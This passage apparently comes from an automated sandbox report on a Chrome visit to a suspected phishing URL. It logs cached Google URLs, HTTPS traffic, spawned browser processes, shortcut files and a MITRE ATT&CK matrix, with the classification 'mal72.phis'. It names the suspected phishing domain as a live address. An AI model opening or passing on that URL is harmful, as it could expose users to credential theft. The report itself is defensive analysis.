    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/open_family_link_v2_dark.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help_dark.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space.png
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space_dark.png
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setupcontrol.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setupcontrol_dark.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuplocation.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuplocation_dark.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuptimelimits.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuptimelimits_dark.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2_dark.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/youtubeaccess.svg
    Source: chromecache_107.1.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/youtubeaccess_dark.svg
    Source: chromecache_145.1.drString found in binary or memory: https://stagingqual-feedback-pa-googleapis.sandbox.google.com
    Source: chromecache_166.1.dr, chromecache_139.1.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
    Source: chromecache_116.1.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com
    Source: chromecache_145.1.dr, 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://support.google.com/accounts?hl=
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://support.google.com/accounts?p=new-si-ui
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/chrome/?p=beta_forum_hc
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/chrome/?p=betadesktop
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/chrome/answer/6130773?hl=en&amp;co=GENIE.Platform%3DAndroid
    Source: 7ec8386f-975e-43a6-9bc2-903b5c13f760.tmp.0.dr, 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/chrome/answer/6130773?hl=en&amp;co=GENIE.Platform%3DDesktop
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/chrome/answer/6130773?hl=en&amp;co=GENIE.Platform%3DiOS
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/communities/answer/7424249
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/communities/answer/7425194
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/embed/tagging/install
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/google-ads/workflow/14159772
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://support.google.com/google-ads/workflow/14282534
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://support.google.com/inapp/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://support.google.com/inapp/%
    Source: chromecache_137.1.drString found in binary or memory: https://support.google.com/websearch/answer/4358949?hl=ko&ref_topic=3285072
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://supporttagging-autopush.sandbox.google.com/embed/tagging/install
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://tagassistant.google.com/
    Source: chromecache_166.1.dr, chromecache_140.1.dr, chromecache_139.1.drString found in binary or memory: https://td.doubleclick.net
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://test-scone-pa-googleapis.sandbox.google.com
    Source: chromecache_138.1.dr, chromecache_107.1.drString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
    Source: chromecache_140.1.dr, 6130773.htm.crdownload.0.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://www.google.%/ads/ga-audiences
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://www.google.cn/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://www.google.cn/tools/feedback/%
    Source: chromecache_139.1.drString found in binary or memory: https://www.google.com
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.google.com/accounts/TOS
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://www.google.com/ads/ga-audiences
    Source: chromecache_137.1.drString found in binary or memory: https://www.google.com/intl/
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.google.com/recaptcha/api.js?trustedtypes=true&onload=
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.google.com/recaptcha/api.js?trustedtypes=true&render=explicit&onload=
    Source: chromecache_145.1.dr, 6130773.htm.crdownload.0.drString found in binary or memory: https://www.google.com/tools/feedback
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://www.google.com/tools/feedback/
    Source: chromecache_135.1.dr, chromecache_145.1.drString found in binary or memory: https://www.google.com/tools/feedback/%
    Source: chromecache_145.1.drString found in binary or memory: https://www.google.com/tools/feedback/help_panel_binary.js
    Source: chromecache_166.1.dr, chromecache_140.1.dr, chromecache_139.1.drString found in binary or memory: https://www.googleadservices.com
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.googleapis.com/youtube/v3
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.googleapis.com/youtube/v3/videos?part=snippet%2C
    Source: chromecache_139.1.drString found in binary or memory: https://www.googletagmanager.com
    Source: chromecache_127.1.dr, chromecache_116.1.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-H30R9PNQFN
    Source: chromecache_107.1.drString found in binary or memory: https://www.gstatic.com/accounts/speedbump/authzen_optin_illustration.gif
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
    Source: chromecache_107.1.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/chrome_48dp.png
    Source: chromecache_107.1.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png
    Source: chromecache_107.1.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/gsa_48dp.png
    Source: chromecache_107.1.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/play_prism_48dp.png
    Source: chromecache_107.1.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/youtube_48dp.png
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://www.gstatic.com/images/branding/productlogos/googleg/v6/36px.svg
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
    Source: chromecache_146.1.dr, chromecache_128.1.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/
    Source: chromecache_145.1.drString found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/
    Source: chromecache_166.1.dr, chromecache_139.1.drString found in binary or memory: https://www.merchant-center-analytics.goog
    Source: 6130773.htm.crdownload.0.drString found in binary or memory: https://www.youtube.com/embed/
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://www.youtube.com/t/terms?chromeless=1&hl=
    Source: chromecache_104.1.dr, chromecache_137.1.drString found in binary or memory: https://youtube.com/t/terms?gl=
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: classification engineClassification label: mal72.phis.win@32/123@51/15
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://52kz793.afratradingagency.com/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4064 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4064 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Drive-by Compromise
    Windows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://52kz793.afratradingagency.com/0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://52kz793.afratradingagency.com/favicon.ico0%Avira URL Cloudsafe
